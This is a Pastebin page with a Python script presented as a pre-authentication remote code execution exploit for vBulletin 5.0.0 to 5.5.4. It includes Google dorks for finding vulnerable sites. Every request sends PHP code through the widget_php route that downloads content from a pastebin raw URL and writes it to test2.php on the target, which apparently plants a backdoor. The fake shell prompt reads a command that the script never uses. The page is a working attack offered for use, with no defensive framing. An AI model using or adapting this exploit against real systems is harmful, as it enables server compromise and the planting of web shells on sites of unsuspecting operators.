SHARE
TWEET

s4e

a guest Sep 27th, 2019 51 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #
  3. # vBulletin 5.x 0day pre-auth RCE exploit
  4. #
  5. # This should work on all versions from 5.0.0 till 5.5.4
  6. #
  7. # Google Dorks:
  8. # - site:*.vbulletin.net
  9. # - "Powered by vBulletin Version 5.5.4"
  10.  
  11. import requests
  12. import sys
  13.  
  14. if len(sys.argv) != 2:
  15.     sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
  16.  
  17. params = {"routestring":"ajax/render/widget_php"}
  18.  
  19. while True:
  20.      try:
  21.           cmd = raw_input("vBulletin$ ")
  22.           s4e = "https://pastebin.com/raw/nCNNLLb7"
  23.           params["widgetConfig[code]"] = "echo file_put_contents('test2.php',file_get_contents('"+s4e+"')); exit;"
  24.           r = requests.post(url = sys.argv[1], data = params)
  25.           if r.status_code == 200:
  26.                print r.text
  27.           else:
  28.                sys.exit("Exploit failed! :(")
  29.      except KeyboardInterrupt:
  30.           sys.exit("\nClosing shell...")
  31.      except Exception, e:
  32.           sys.exit(str(e))
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top